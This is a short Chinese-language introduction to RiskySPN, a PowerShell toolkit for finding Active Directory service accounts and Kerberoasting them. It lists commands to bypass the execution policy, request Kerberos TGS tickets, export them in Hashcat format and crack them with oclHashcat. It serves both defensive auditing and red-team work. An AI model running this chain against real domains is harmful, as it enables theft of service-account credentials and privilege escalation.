關于RiskySPN 

RiskySPN是一系列功能強大的PowerShell腳本集合,可以幫助廣大研究人員檢測和濫用跟SPN(服務主體名稱)相關的賬戶。除此之外,該工具不僅可以幫助藍隊研究人員識別存在安全風險的SPN,還可以幫助紅隊研究人員利用Kerberos和活動目錄來實現權限提升。

 工具要求 

由于該工具中的腳本模塊基于PowerShell實現,因此我們需要在能夠運行PowerShell腳本的設備上使用該工具。

 工具安裝 

廣大研究人員可以直接使用下列命令將該項目源碼克隆至本地:

git clone https://github.com/cyberark/RiskySPN.git

 工具使用 

安裝模塊

Import-Module .\RiskySPNs.psm1

或者,直接加載項目中的功能腳本:

. .\Find-PotentiallyCrackableAccounts.ps1

注意:這里需要確保Set-ExecutionPolicy的值設置成了Unrestricted或Bypass。

查看某個函數模塊的詳細功能信息

Get-Help Get-TGSCipher -Full

注意:所有的功能函數都提供了-Verbose模式。

搜索存在安全漏洞的SPN(服務主體名稱)

搜索存在安全漏洞的賬戶:

Find-PotentiallyCrackableAccounts敏感數據 + RC4 = $$$

生成包含漏洞賬戶的詳細分析報告(CISO < 3):

Export-PotentiallyCrackableAccounts

獲取憑證信息

請求Kerberos TGS:

Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"
或
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher

其他使用方法

Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3

 許可證協議 

本項目的開發與發布遵循GPL-3.0開源許可證協議。

 項目地址 

RiskySPN:https://github.com/cyberark/RiskySPN